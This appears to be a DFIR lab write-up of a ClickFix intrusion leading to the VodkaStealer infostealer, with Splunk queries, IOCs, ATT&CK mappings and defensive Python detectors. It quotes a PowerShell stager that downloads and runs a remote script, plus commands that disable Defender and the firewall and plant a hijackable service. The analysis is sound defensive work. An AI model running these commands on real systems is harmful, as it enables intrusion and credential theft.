NextGen Financial Solutions’ SOC flagged anomalous PowerShell activity on an employee workstation during routine monitoring. Initial triage traced the activity to a legitimate external website compromised with a ClickFix overlay — a fake CAPTCHA verification prompt that silently copies a malicious command to the visitor’s clipboard and instructs them to paste it into the Windows Run dialog. Before the incident response team could contain the threat, the attacker had escalated privileges, moved laterally across the corporate network, and deployed a custom infostealer dubbed VodkaStealer on multiple endpoints. Evidence suggests sensitive data including browser credentials, cryptocurrency wallet files, and internal documents was collected, staged, and exfiltrated to an external server. Four hosts are in scope: PAYOPS-WS-04, BCHAIN-WS-11, COMP-FS-01, and DC01. Artifacts include Splunk log data from all hosts and Velociraptor disk collections.
With 1.17 million events across four hosts, the first step was understanding the data distribution. PAYOPS-WS-04 dominated at 70,911 events — the initial victim machine. BCHAIN-WS-11 held 32,714, COMP-FS-01 4,721, and DC01 4,154. Source breakdown revealed Security logs at 97% of events with Sysmon sparse at 419 events total across all hosts. This meant heavy reliance on Security event IDs (4624, 4663, 4688, 5145) and TaskScheduler logs rather than Sysmon process telemetry for most of the investigation.
The disk artifacts are Velociraptor collections using the Windows.KapeFiles.Targets artifact set, collecting $MFT, $J (USN journal), $LogFile, browser data, and registry hives. File paths are URL-encoded under uploads/auto/C%3A/.
The compromise began when NEXTGEN\n.hesham visited a website at 3.122.229.6 that had been injected with a ClickFix CAPTCHA overlay. The fake verification prompt instructs the victim to press Win+R and paste a command — the PowerShell stager is already sitting in the clipboard. There is no artefact of the lure text itself in the logs; the social engineering lives entirely on the compromised webpage. The clipboard delivers only the raw execution command.
The infection timestamp was established by searching for Sysmon EventCode 3 outbound connections from n.hesham, then narrowing to a two-minute window around the C2 beacon to find the parent process:
index=* host="PAYOPS-WS-04" EventCode=1 parent_process_name="explorer.exe"

explorer.exe as the parent process confirms the Run dialog as the execution vector — a browser or script parent would indicate a different delivery mechanism. The full command logged at 23:53:49 on 4/20/2026:
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://3.122.229.6/payload.ps1')"

payload.ps1 downloaded and executed from 3.122.229.6, establishing an outbound C2 beacon to 100.52.249.75:443 via powershell.exe approximately 68 seconds after execution. The beacon was confirmed via Sysmon EventCode 3 filtering for n.hesham outbound connections:
index=* EventCode=3 "NEXTGEN\\n.hesham"
| table _time, dest_ip, DestinationPort, process_name
| sort _time asc

With a low-privilege C2 shell on PAYOPS-WS-04, the attacker performed WMI service enumeration looking for unquoted paths. The command was recovered from Security logs by filtering for n.hesham activity with PathName in the CommandLine, narrowing the time window to 23:52–23:59 to cut through noise:
index="main" "NEXTGEN\\n.hesham" PAYOPS CommandLine="*PathName*"

The full enumeration command piped output through findstr filtering specifically for DataSync — indicating the attacker already knew what service to look for, or ran a targeted second pass after initial enumeration:
C:\Windows\system32\cmd.exe /C wmic service get name,pathname,startmode | findstr /i "DataSync"
The attacker did not exploit a pre-existing misconfiguration — they created the vulnerable service themselves. PSReadLine history for k.mostafa.admin on PAYOPS-WS-04 (recovered from the Velociraptor artifact at C:\Users\k.mostafa.admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt) revealed the full setup:
New-Item -ItemType Directory -Path "C:\Program Files\DataSync Pro\Sync Service" -Force
& $cscPath /target:exe /reference:System.ServiceProcess.dll /out:"C:\Program Files\DataSync Pro\Sync Service\datasync-svc.exe" C:\Temp\DataSyncService.cs
icacls "C:\Program Files\DataSync Pro" /grant "BUILTIN\Users:(OI)(CI)(M)" /T
sc.exe create "DataSyncPro" binPath= "C:\Program Files\DataSync Pro\Sync Service\datasync-svc.exe" start= auto
Set-MpPreference -DisableRealtimeMonitoring $true
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
csc.exe compiled a legitimate-looking C# Windows service binary on the fly. The icacls grant deliberately gave all users modify access to C:\Program Files\DataSync Pro\, creating the exploitable surface. Because the service path is unquoted and contains spaces, the service control manager tries each space-delimited prefix with .exe appended before resolving the full path: C:\Program.exe, then C:\Program Files\DataSync.exe, then C:\Program Files\DataSync Pro\Sync.exe, and only then DataSync Pro\Sync Service\datasync-svc.exe. Sysmon EventCode 11 confirmed PowerShell.exe writing Sync.exe to C:\Program Files\DataSync Pro\ at 00:00:38, which is exactly that third candidate.

A forced reboot followed 31 seconds later via shutdown /r /t 5 /f, triggering the DataSyncPro service on startup and executing Sync.exe as SYSTEM. The hijack re-ran payload.ps1 — confirmed by the identical ParentCommandLine in the post-reboot Sysmon event with CurrentDirectory: C:\Program Files\DataSync Pro\.

Post-reboot, rundll32.exe running as NT AUTHORITY\SYSTEM replaced powershell.exe as the C2 process, maintaining the encrypted HTTPS channel to 100.52.249.75:443. Using rundll32 as a C2 carrier blends into normal Windows process listings.

With SYSTEM privileges, the C2 shell targeted LSASS for credential harvesting. Sysmon EventCode 10 (ProcessAccess) confirmed rundll32.exe as SYSTEM accessing lsass.exe with GrantedAccess=0x1010 — the standard Mimikatz read handle. The query that cut through CAPI2 noise:
index="*" PAYOPS "*lsass*" EventCode=10 "C:\\Windows\\system32\\rundll32"
| table _time, SourceImage, TargetImage, GrantedAccess, User
| sort _time asc

First LSASS access: 2026-04-21 00:16:52.
Credentials harvested from LSASS included the domain admin account k.mostafa.admin. Pass-the-hash lateral movement was identified simply by examining Security EventCode 4624 LogonType 3 events and inspecting the Target_User_Name field values — k.mostafa.admin stood out immediately against the machine accounts:
index="*" EventCode=4624 LogonType=3

k.mostafa.admin authenticated to COMP-FS-01 at 10.10.11.81, confirmed by the DC01 Security log showing the source IP.

Impacket psexec-style execution dropped 2fdb156.exe to \\10.10.11.81\ADMIN$ — the random hex filename in ADMIN$ is the signature of this technique. Confirmed via EventCode 7045 on COMP-FS-01:
index="*" host="COMP-FS-01" (EventCode=7045 OR EventCode=4697)

Splunk had no file deletion telemetry on COMP-FS-01 — the host lacked Sysmon file delete coverage and Security object deletion auditing was not enabled. The deletion timestamp was recovered from the NTFS USN journal ($J) in the Velociraptor collection, parsed with NTFS Log Tracker. The journal recorded File_Closed, File_Deleted for 2fdb156.exe at 00:30:47 — just two seconds after creation at 00:30:45, consistent with Impacket’s immediate cleanup pattern.

k.mostafa.admin also moved laterally to BCHAIN-WS-11 (10.10.11.206) using the same technique, dropping cc53f75.exe to ADMIN$ at 01:44 — confirmed via Suricata eve.json SMB logs, which provided network-layer coverage where Windows endpoint logging was insufficient.
The attacker deployed persistence across all compromised hosts via a scheduled task masquerading as a legitimate DataSync maintenance job. Task creation events (EventCode 4698) with the TaskName field revealed two tasks:
index=* EventCode=4698
| table _time, host, TaskName, TaskContent, SubjectUserName
| sort _time asc

The primary task \NextGen\DataSync Update fired across all hosts. Expanding the TaskContent XML revealed the full execution context:

<Command>powershell.exe</Command>
<Arguments>-nop -w hidden -ep bypass -File C:\ProgramData\svc_update.ps1 -SkipChecks</Arguments>
<UserId>NT AUTHORITY\SYSTEM</UserId>
A secondary persistence mechanism appeared as \OneDrive Standalone Update Task-NEXTGEN\k.mostafa.admin — a OneDrive masquerade using the stolen admin account, providing redundancy if the primary task was detected. The scheduled task fired at 01:20 AM on 4/21/2026.
The -SkipChecks flag bypasses Phase A of VodkaStealer’s pre-flight checks — designed for sandbox evasion via geo-IP and keyboard layout detection (exits on RU/BY). Phase B kills browser processes to unlock SQLite credential databases. EventCode 4689 confirmed msedge.exe and opera.exe terminated by k.mostafa.admin between 01:20 and 01:30:
index=* EventCode=4689 (process="*edge*" OR process="*opera*")

Phase C creates a staging directory using the format sysinfo_{CountryCode}_{PublicIP}_{DDMMYYYYHHmm} in %TEMP%. The first execution on PAYOPS-WS-04 created C:\Windows\Temp\sysinfo_US_10.0.0.1_210420260133 at 01:33, confirmed via Sysmon EventCode 11:
index=* EventCode=11 TargetFilename="*temp*" "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell" host="PAYOPS-WS-04"
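The Phase C naming scheme can be turned into a detection over Sysmon EventCode 11 TargetFilename values. The following Python is an added example, not part of the original write-up or of VodkaStealer: the regex encodes the sysinfo_{CountryCode}_{PublicIP}_{DDMMYYYYHHmm} format and rejects 12-digit suffixes that are not real timestamps; the sample events are constructed, with the first mirroring the PAYOPS-WS-04 directory above.

```python
import re
from datetime import datetime
from typing import List, Optional

# sysinfo_{CountryCode}_{PublicIP}_{DDMMYYYYHHmm}: the Phase C staging directory name.
STAGING_RE = re.compile(
    r"[\\/]sysinfo_(?P<cc>[A-Z]{2})_(?P<ip>(?:\d{1,3}\.){3}\d{1,3})_(?P<ts>\d{12})(?=[\\/]|$)",
    re.IGNORECASE,
)

def parse_staging_path(target_filename: str) -> Optional[dict]:
    """Decode the staging-directory fields if the path follows the Phase C scheme,
    else None. The 12-digit suffix must parse as a real DDMMYYYYHHmm timestamp."""
    m = STAGING_RE.search(target_filename)
    if not m:
        return None
    try:
        created = datetime.strptime(m.group("ts"), "%d%m%Y%H%M")
    except ValueError:
        return None  # twelve digits, but not a date: not this pattern
    return {"country": m.group("cc").upper(), "public_ip": m.group("ip"),
            "created": created, "staging_dir": target_filename[:m.end()]}

# Constructed Sysmon EventCode 11 records (not case data); only TargetFilename matters.
SAMPLE_SYSMON_11 = [
    {"host": "PAYOPS-WS-04", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Windows\Temp\sysinfo_US_10.0.0.1_210420260133\screenshot.png"},
    {"host": "BCHAIN-WS-11", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Windows\Temp\sysinfo_US_10.0.0.1_210420260145\y.tarek\Wallets\MetaMask\000003.log"},
    {"host": "PAYOPS-WS-04", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\Temp\sysinfo_report.txt"},
    {"host": "COMP-FS-01", "Image": r"C:\Windows\System32\notepad.exe",
     "TargetFilename": r"C:\Windows\Temp\sysinfo_US_10.0.0.1_991399999999\x.txt"},
]

def find_staging_activity(events: List[dict]) -> List[dict]:
    """One finding per event whose TargetFilename sits under a Phase C staging directory."""
    findings = []
    for ev in events:
        parsed = parse_staging_path(ev["TargetFilename"])
        if parsed:
            findings.append({"host": ev["host"], "image": ev["Image"], **parsed})
    return findings

if __name__ == "__main__":
    for hit in find_staging_activity(SAMPLE_SYSMON_11):
        print(hit["host"], hit["staging_dir"], hit["created"].isoformat())
```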

On BCHAIN-WS-11, the staging directory captured MetaMask wallet extension data from y.tarek\Wallets\MetaMask\ — exactly the target profile for a blockchain workstation. Phase D collects across eight sub-phases: installed software, system info, screenshots, Chromium browser data (Login Data, Cookies, Web Data, History) from Chrome/Edge/Brave/Opera/Vivaldi/Yandex, Firefox profiles (logins.json, key4.db), crypto wallet applications (Exodus, Electrum, Bitcoin Core, Coinomi), and browser wallet extensions (MetaMask, Phantom, TrustWallet, CoinbaseWallet).
Phase E stages everything into a ZIP archive and exfiltrates via raw TCP socket. The exfil server was identified by filtering external connections excluding known C2 and payload IPs:
index=* EventCode=3
NOT (dest_ip="10.*" OR dest_ip="172.*" OR dest_ip="192.168.*")
NOT dest_ip="100.52.249.75" NOT dest_ip="3.122.229.6"
| stats count by dest_ip, dest_port, host
| sort -count


PAYOPS-WS-04 exfiltrated to 165.245.213.184:8443. BCHAIN-WS-11 exfiltrated to the same IP on port 4444 — flagged by Sysmon with technique_name=Non-Standard Port.
The full VodkaStealer v2 script was recovered from PowerShell ScriptBlock logging (EventCode 4104) on BCHAIN-WS-11, where it had been captured in memory during execution. Six execution phases are defined: A (Pre-Flight), B (Browser Kill), C (Staging Directory), D (Data Collection), E (Exfiltration), F (Cleanup).

| Phase | Action |
|---|---|
| Initial Access | n.hesham visits compromised site 3.122.229.6; ClickFix CAPTCHA delivers PowerShell stager via Win+R Run dialog |
| Execution | payload.ps1 executes; C2 beacon to 100.52.249.75:443 via powershell.exe at 23:54 |
| Discovery | WMI service enumeration: wmic service get name,pathname,startmode piped through findstr for DataSync |
| Defense Evasion | Defender real-time monitoring disabled; Windows Firewall disabled domain/public/private profiles |
| Privilege Escalation | Attacker creates DataSyncPro service with deliberately unquoted path; drops Sync.exe; forces reboot |
| Persistence (Pre-Creds) | rundll32.exe SYSTEM C2 beacon established post-reboot via service hijack |
| Credential Access | rundll32.exe opens lsass.exe GrantedAccess=0x1010 at 00:16:52; k.mostafa.admin harvested |
| Lateral Movement | PTH to COMP-FS-01 (10.10.11.81) and BCHAIN-WS-11 via Impacket psexec over ADMIN$ |
| Persistence | Scheduled task \NextGen\DataSync Update deploys svc_update.ps1 as SYSTEM across all hosts |
| Collection | VodkaStealer harvests browser credentials, crypto wallets, screenshots, system info from all user profiles |
| Exfiltration | Data ZIPped and sent raw TCP to 165.245.213.184:8443 (PAYOPS) and :4444 (BCHAIN) |
| Cleanup | Lateral movement binaries deleted within seconds; staging directories and ZIPs removed post-exfil |

| Type | Value |
|---|---|
| IP (Compromised Site / Payload Host) | 3[.]122[.]229[.]6 |
| IP (C2 Server) | 100[.]52[.]249[.]75 |
| IP (Exfil Server) | 165[.]245[.]213[.]184 |
| IP (File Server) | 10[.]10[.]11[.]81 |
| IP (BCHAIN Workstation) | 10[.]10[.]11[.]206 |
| URL (Initial Payload) | hxxp[://]3[.]122[.]229[.]6/payload[.]ps1 |
| File | payload.ps1 |
| File | Sync.exe |
| File | svc_update.ps1 |
| File | 2fdb156.exe |
| File | cc53f75.exe |
| Scheduled Task | \NextGen\DataSync Update |
| Scheduled Task | \OneDrive Standalone Update Task-NEXTGEN\k.mostafa.admin |
| Account (Compromised Domain Admin) | NEXTGEN\k.mostafa.admin |
| Account (Initial Victim) | NEXTGEN\n.hesham |
| Staging Dir Pattern | C:\Windows\Temp\sysinfo_{CC}_{IP}_{DDMMYYYYHHmm} |
| Exfil Port (PAYOPS-WS-04) | 8443 |
| Exfil Port (BCHAIN-WS-11) | 4444 |

| Technique | ID | Description |
|---|---|---|
| User Execution: Malicious File | T1204.002 | User pastes ClickFix PowerShell command into Win+R Run dialog |
| PowerShell | T1059.001 | payload.ps1 and svc_update.ps1 executed via hidden PowerShell |
| Hijack Execution Flow: Unquoted Service Path | T1574.009 | Sync.exe placed in C:\Program Files\DataSync Pro\ (the path candidate Windows tries before the real binary) to intercept DataSyncPro service startup |
| OS Credential Dumping: LSASS Memory | T1003.001 | rundll32.exe as SYSTEM opens lsass.exe with GrantedAccess=0x1010 |
| Use Alternate Authentication Material: Pass the Hash | T1550.002 | k.mostafa.admin NTLM hash used for lateral movement to COMP-FS-01 and BCHAIN-WS-11 |
| Remote Services: SMB/Windows Admin Shares | T1021.002 | Impacket psexec drops binaries via ADMIN$ share to both lateral movement targets |
| Scheduled Task/Job: Scheduled Task | T1053.005 | \NextGen\DataSync Update persistence deployed across all compromised hosts |
| Credentials from Password Stores: Web Browsers | T1555.003 | VodkaStealer harvests Login Data, Cookies from Chrome, Edge, Opera across all user profiles |
| Exfiltration Over C2 Channel | T1041 | Raw TCP socket exfil to 165.245.213.184 on ports 8443 and 4444 |
| Indicator Removal: File Deletion | T1070.004 | Lateral movement binaries deleted within seconds of execution; staging dirs cleaned post-exfil |
| Masquerading: Match Legitimate Name | T1036.005 | Scheduled task name mimics DataSync maintenance job; secondary task mimics OneDrive updater |
| Impair Defenses: Disable or Modify Tools | T1562.001 | Defender real-time monitoring and Windows Firewall disabled via PowerShell |

ClickFix requires updated awareness training. The entire initial access chain required zero technical exploitation — the victim pasted the attacker’s command into their own Run dialog. Standard phishing training covering malicious links and attachments does not address clipboard-based delivery. Security awareness programs need to explicitly cover the ClickFix pattern: no legitimate website or CAPTCHA will ever ask you to run a command on your own machine.
Audit and quote all service paths with spaces. The DataSyncPro service was created with a deliberately unquoted path, but this class of misconfiguration exists in many real environments due to legacy software installers. Auditing all services with wmic service get name,pathname,startmode | findstr /i " " and quoting all paths containing spaces eliminates the hijack surface entirely. The attacker also granted write access to C:\Program Files\DataSync Pro\ for all users — file permission auditing on service directories is equally important.
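As an added example (not code from the write-up), the following Python reproduces the path-splitting rule behind the DataSyncPro hijack described earlier and turns it into the audit recommended here: for every unquoted ImagePath containing spaces it lists the executables the service control manager would try before the real binary. The sample service table is constructed; load_services_from_registry reads the live values on a Windows host.

```python
from typing import Dict, List, Tuple

# Constructed sample of service ImagePath values (not the incident's registry); the
# DataSyncPro entry mirrors the sc.exe create command recovered from PSReadLine history.
SAMPLE_SERVICES: Dict[str, str] = {
    "DataSyncPro": r"C:\Program Files\DataSync Pro\Sync Service\datasync-svc.exe",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "GoodVendorSvc": r'"C:\Program Files\Good Vendor\svc.exe" -run',
}

def hijack_candidates(image_path: str) -> List[str]:
    """Executables the service control manager tries, in order, before the real binary
    of an unquoted path with spaces; empty if the path is quoted or space-free."""
    path = image_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    parts = path.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the real executable; remaining tokens are arguments
        candidates.append(prefix + ".exe")
    return candidates

def audit_services(services: Dict[str, str]) -> List[Tuple[str, List[str]]]:
    """Return (service name, hijack candidates) for every vulnerable service."""
    return [(name, hijack_candidates(p)) for name, p in services.items()
            if hijack_candidates(p)]

def load_services_from_registry() -> Dict[str, str]:
    """Windows only: ImagePath of every key under HKLM\\SYSTEM\\CurrentControlSet\\Services."""
    import winreg
    services = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as root:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(root, index)
            except OSError:
                break  # no more subkeys
            index += 1
            try:
                with winreg.OpenKey(root, name) as key:
                    services[name] = winreg.QueryValueEx(key, "ImagePath")[0]
            except OSError:
                pass  # key without an ImagePath value
    return services

if __name__ == "__main__":
    for name, cands in audit_services(SAMPLE_SERVICES):
        print(name, "->", cands)
```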
Scheduled task creation needs active alerting. The \NextGen\DataSync Update task name was convincing enough to blend into a legitimate maintenance schedule. EventCode 4698 (scheduled task creation) with alerting on tasks executing from C:\ProgramData\, C:\Windows\Temp\, or any SYSTEM-context PowerShell with -ep bypass provides reliable detection for this persistence pattern regardless of how well the task name is disguised.
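The alerting rule described here, as an added example (not the write-up's own detection content): Python that parses the TaskContent XML carried in EventCode 4698 and flags the two conditions above. The 4698 records are constructed, the first reconstructed from the DataSync Update task fields quoted earlier.

```python
import re
import xml.etree.ElementTree as ET
from typing import List

# Directories a SYSTEM task should never run a script from (lower-case for matching).
SUSPICIOUS_DIRS = ("c:\\programdata\\", "c:\\windows\\temp\\")
SYSTEM_IDS = ("nt authority\\system", "s-1-5-18", "system")
EP_BYPASS = re.compile(r"-e(?:p|x\w*)\s+bypass")  # -ep / -exec / -executionpolicy bypass

def _text(root: ET.Element, local_name: str) -> str:
    """First text value of an element by local name, ignoring the task XML namespace."""
    for elem in root.iter():
        if elem.tag.rsplit("}", 1)[-1] == local_name and elem.text:
            return elem.text.strip()
    return ""

def evaluate_task(task_xml: str) -> List[str]:
    """Alert reasons for one 4698 TaskContent payload; an empty list means no alert."""
    root = ET.fromstring(task_xml)
    command = _text(root, "Command").lower()
    args = _text(root, "Arguments").lower()
    user = _text(root, "UserId").lower()
    reasons = []
    if any(d in command or d in args for d in SUSPICIOUS_DIRS):
        reasons.append("executes from C:\\ProgramData\\ or C:\\Windows\\Temp\\")
    if "powershell" in command and user in SYSTEM_IDS and EP_BYPASS.search(args):
        reasons.append("SYSTEM-context PowerShell with execution policy bypass")
    return reasons

# Constructed 4698 events: the first mirrors the DataSync Update task, the second a benign built-in task.
SAMPLE_4698_EVENTS = [
    {"host": "PAYOPS-WS-04", "TaskName": "\\NextGen\\DataSync Update", "TaskContent":
     '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
     '<Principals><Principal id="Author"><UserId>NT AUTHORITY\\SYSTEM</UserId></Principal></Principals>'
     '<Actions><Exec><Command>powershell.exe</Command><Arguments>-nop -w hidden -ep bypass '
     '-File C:\\ProgramData\\svc_update.ps1 -SkipChecks</Arguments></Exec></Actions></Task>'},
    {"host": "PAYOPS-WS-04", "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "TaskContent":
     '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
     '<Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>'
     '<Actions><Exec><Command>%windir%\\system32\\defrag.exe</Command>'
     '<Arguments>-c -h -k -g</Arguments></Exec></Actions></Task>'},
]

def scan_4698(events: List[dict]) -> List[dict]:
    """Apply evaluate_task to a batch of 4698 events; one alert per flagged task."""
    alerts = []
    for ev in events:
        reasons = evaluate_task(ev["TaskContent"])
        if reasons:
            alerts.append({"host": ev["host"], "task": ev["TaskName"], "reasons": reasons})
    return alerts
```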
Deploy Sysmon uniformly — file server gaps cost investigation time. COMP-FS-01 had no Sysmon file deletion telemetry, requiring USN journal analysis via NTFS Log Tracker to recover the 2fdb156.exe deletion timestamp. The journal had the answer but parsing it was not the intended fast path. Full Sysmon deployment including EventID 11 (FileCreate) and EventID 23 (FileDelete) across all hosts — not just workstations — closes this gap and keeps investigations in a single pane.
Suricata SMB logs fill endpoint blind spots. The eve.json SMB telemetry was the only source that confirmed cc53f75.exe activity on BCHAIN-WS-11 when Windows Security and Sysmon logs were insufficient. Network-layer logging via Suricata with SMB protocol inspection provides coverage independent of endpoint agent deployment and is particularly valuable for lateral movement via admin shares.